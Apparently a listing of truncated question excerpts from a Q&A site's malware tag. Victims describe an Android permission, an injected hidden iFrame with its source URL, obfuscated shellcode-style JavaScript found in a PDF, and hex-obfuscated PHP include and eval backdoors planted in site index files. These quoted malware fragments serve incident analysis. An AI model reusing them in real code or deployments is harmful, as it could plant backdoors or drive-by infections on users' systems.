malware

I have seen some Android apps on my phone require this android.permission.READ_PHONE_STATE permission. I don't know if I could trust them. I know this permission will give the app access to many information. I'm particularly interested in what functionality in an Android app normally require the information like DeviceId , SimSerialNumber , SubscriberId ? Samuel Bolduc Phone state provides access to a lot of information about the phone. Usual usages will be for reading the IMEI of your phone and your phone number. This can be useful to identify you in their systems. It can also be needed if

A few months ago, a hidden iFrame started showing up on every page on every site on our dedicated server. When we took the sites down for maintenance with a 503, the iFrame was still there on the down for maintenance page. Eventually, the host blocked the source of the iFrame, but we never found the backdoor. The injected iFrame looked something like this, but wrapped in a style tag to obfuscate and with various URLs: iframe src="http://heusnsy.nl/32283947.html.. We moved our smaller sites to a different host, and they've been fine. We moved our main site to a new dedicated server on the same

I have a PDF file that I know for a fact contains a JavaScript script file that does something malicious, not really sure what at this point. I have successfully uncompressed the PDF file and gotten the plaintext JavaScript source code, but it the code itself if kind of hidden in this syntax I haven't seen before. Code example: This is what the majority of the code looks like var bDWXfJFLrOqFuydrq = unescape; var QgFjJUluesCrSffrcwUwOMzImQinvbkaPVQwgCqYCEGYGkaGqery = bDWXfJFLrOqFuydrq( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692....') I imagine that this

Are there ways to prevent, or make it difficult enough, for someone to inject Javascript and manipulate the variables or access functions? A thought I had is to change all var names randomly on each reload so the malware script would need to be rewritten every time? Or are there other less painful ways? I understand that eventually someone will hack his way in, but I'd like to know ways to make it difficult to reproduce the action, so that people won't publish a bookmarklet or something similar for everyone to use. I don't care if experts find their way in the code, but I'd like it to be a bit

I have three websites all hosted on the same webserver. Recently I was working on one of the websites and noticed that, about a month ago, a bunch of files had been changed. Specifically, all instances of index.html had been renamed to index.html.bak.bak , and index.php files have been put in their places. The index.php files are relatively simple; they include a file hidden somewhere in each website's filesystem (seemingly a random folder) that's been obfuscated with JS hex encoding, then echo the original index.html: <?php /*2d4f2*/ @include "\x2fm\x6et\x2fs\x74o\x721\x2dw\x631\x2dd\x66w\x31

I just notice all of my index file are having following code in my server. I would like to know how can i decode this. and find out who is behind with this code? please can you help me how to decode this. <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir =